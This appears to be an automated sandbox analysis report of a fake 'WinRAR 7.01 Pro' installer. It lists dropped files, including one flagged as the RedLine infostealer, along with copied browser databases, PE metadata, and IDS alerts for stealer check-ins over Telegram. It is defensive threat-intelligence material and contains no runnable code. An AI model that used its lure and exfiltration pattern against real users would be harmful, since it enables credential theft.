MD5:	008104B045E7247567EA4EEF3458A310
SHA1:	6A2E521605C029AB4E0E961AA782CE68736D9E03
SHA-256:	950C01DA8898949F1F69A008EFBFE2378DC75009407882C2B63E88130E0D4D1D
SHA-512:	53ACC94334036F4ECCA676A1652A3FCDF46E0F7817109E142FA042818D0523275B62D638C22B58EB6A84AADF4872E27A3C2481D7503B3A26F40A88D753F71325
Malicious:	false
Preview:	147548

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WinRAR 7.01 Pro.exe.log

Download File

Process:	C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.363435887027673
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTt92W+P12MUAvvrs:Q3La/KDLI4MWuPTAt92n4M6
MD5:	073F05396DE9273ED9563E2E299BB296
SHA1:	3EBA610FE88F782B4BCA99C3C39DC6AF65C574ED
SHA-256:	C180FCC444FA7EAAC96D0EBC011ADA54DCFF3022C06087CB2526A182BA05C30B
SHA-512:	354432510FD8C60EAC239DC8E9BE7A8C92CACB0FC09F3908721D41B8BBD8F480E88D650BC6AB306CAFE3D189660356200BB2F5E11143776222A75B2F9C5748BE
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Download File

Process:	C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498688
Entropy (8bit):	7.821177560358948
Encrypted:	false
SSDEEP:	12288:qh1Lk70Tnvjck6Ngg6sQaGzUgMyieRxUJOerd/NUBzHiW:Ok70TrcVgg6sQRzUUbReJOu0BzN
MD5:	B2795FBED63C8C1B0846B3EAEAE2FE0F
SHA1:	D1145CFF21E008C9AD581CCF1719139D754355DE
SHA-256:	5EA467D548D41B747370A235C9A245910ED58D55482A48246196FAF391213C24
SHA-512:	47FFCC3C74113DB4C389BA9A6B5DB7CE325D1F63E431405A9F6613918C387DE4A677F20804AAD6AA458BF2151DE418C2F72740F4F5083FB45BF6C4B0F564E564
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~...................f....PE..L...t..P..........#................./.............@..................................;..........................................P....`...z..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc....z...`...\|... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2175.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2186.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2197.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp21A7.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp21B8.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp21E8.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2208.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2219.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2229.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp22C6.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp22D7.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Download File

Process:	C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3961960
Entropy (8bit):	7.9539697162180145
Encrypted:	false
SSDEEP:	98304:xNdBfKEgzVQYAO52weo3VudIlHSTNWA0rkjEaxKdj:vytzAO52wLVu2oBWv7tj
MD5:	5E2849BEF6A38ED0B163EA6128AFEA01
SHA1:	D77E1467DCD5E6662A6B97DE35CB017579AF032A
SHA-256:	6EC13E13059BAC123D839FDE5770DB2C87248EF862D21F5F818580287A365026
SHA-512:	E20BCB346B114C5E6F8F0E82D2143A7C02FFC77056983336A011FBE8E292D8FA0ED8D2AEBAA6F665FFACFA1063F59A2788BC68BBE2605316D7791EEC3A1E1CFB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u...u...u...v...u...p.P.u.J.....u.J.q...u.J.v...u.J.p...u...q...u...s...u...t...u...t...u.D.\|...u.D.u...u.D.....u.D.w...u.Rich..u.........................PE..d...6.@f.........."....!.".....................@.............................@........<...`.........................................PO..4....O..P........n...`...?...K<..(...0..D...@...T.......................(....M..@............@......,A.......................text...~!.......".................. ..`.rdata... ...@..."...&..............@..@.data........p.......H..............@....pdata...?...`...@...Z..............@..@.didat..8...........................@..._RDATA..\...........................@..@.rsrc....n.......p..................@..@.reloc..D....0......................@..B................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.936142698769639
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.69% Win32 Executable (generic) a (10002005/4) 49.64% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% InstallShield setup (43055/19) 0.21% Windows Screen Saver (13104/52) 0.07%
File name:	WinRAR 7.01 Pro.exe
File size:	4'492'800 bytes
MD5:	1c8908102946928867ab16f2007b35cc
SHA1:	7e08b98299e0195a013e53221e3c2efb149eb4ce
SHA256:	e3635b82438e536636955e2fee251073b1038a7e00295a1e0efb003ad49965d5
SHA512:	a559caedc7b00da23cb18607d0f2f05c6954a949dff0c8a4c25f6353163b70fd16722728878bb87c9db5cff86dc0252f967ebc26a66cb975af85f1361372a734
SSDEEP:	98304:DaxGFtNdBfKEgzVQYAO52weo3VudIlHSTNWA0rkjEaxKd:DRdytzAO52wLVu2oBWv7t
TLSH:	2D26231AF6D441F5E077D234C8E28917E6B23C995B71868F27BD476A2F233905A3E342
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".f.................BD..H.......`D.. ....D...@.. ....................... E...........@................................

File Icon


Icon Hash:	b333313b693b9b19

Static PE Info

General

Entrypoint:	0x8460ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BB22B3 [Tue Aug 13 09:09:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4460a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44a000	0x4210	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x450000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x448000	0x1c	.sdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4440f4	0x444200	9e58e021f6718753887cdc086bc1b61f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x448000	0x9e	0x200	cc25252ffe7462a9704b133e9a3e6307	False	0.291015625	data	2.334243349008488	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x44a000	0x4210	0x4400	5d7e7f7f9091382630d14d50f9482835	False	0.4547334558823529	data	5.16715779836387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x450000	0xc	0x200	f5d8a5c3347d0ccb15423a9a1c6d1a19	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x44a538	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.7375886524822695
RT_ICON	0x44a9a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.5356472795497186
RT_ICON	0x44ba48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.4271784232365145
RT_GROUP_ICON	0x44dff0	0x30	data	0.9166666666666666
RT_VERSION	0x44a190	0x3a8	data	0.3995726495726496
RT_MANIFEST	0x44e020	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-13T21:48:56.915212+0200	TCP	2044766	ET MALWARE WorldWind Stealer Checkin via Telegram (GET)	1	49743	443	192.168.2.4	149.154.167.220
2024-08-13T21:48:58.465995+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49744	443	192.168.2.4	149.154.167.220
2024-08-13T21:49:01.755507+0200	TCP	2044557	ET MALWARE WorldWind Stealer Sending System information via Telegram (POST)	1	49746	443	192.168.2.4	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 13, 2024 21:48:53.965229034 CEST	49741	80	192.168.2.4	104.16.185.241
Aug 13, 2024 21:48:53.970457077 CEST	80	49741	104.16.185.241	192.168.2.4
Aug 13, 2024 21:48:53.970526934 CEST	49741	80	192.168.2.4	104.16.185.241
Aug 13, 2024 21:48:53.971620083 CEST	49741	80	192.168.2.4	104.16.185.241
Aug 13, 2024 21:48:53.976574898 CEST	80	49741	104.16.185.241	192.168.2.4
Aug 13, 2024 21:48:54.482363939 CEST	80	49741	104.16.185.241	192.168.2.4
Aug 13, 2024 21:48:54.568281889 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:54.568365097 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:54.568453074 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:54.573107958 CEST	49741	80	192.168.2.4	104.16.185.241
Aug 13, 2024 21:48:54.575643063 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:54.575678110 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:55.047085047 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:55.047173023 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:55.050858974 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:55.050890923 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:55.051305056 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:55.089519024 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:55.132546902 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:55.865756989 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:55.865844011 CEST	443	49742	104.21.44.66	192.168.2.4
Aug 13, 2024 21:48:55.865993023 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:55.867891073 CEST	49742	443	192.168.2.4	104.21.44.66
Aug 13, 2024 21:48:55.879841089 CEST	49741	80	192.168.2.4	104.16.185.241
Aug 13, 2024 21:48:55.888192892 CEST	80	49741	104.16.185.241	192.168.2.4
Aug 13, 2024 21:48:55.888246059 CEST	49741	80	192.168.2.4	104.16.185.241
Aug 13, 2024 21:48:55.892039061 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:55.892122030 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:55.892219067 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:55.892541885 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:55.892577887 CEST	443	49743	149.154.167.220	192.168.2.4
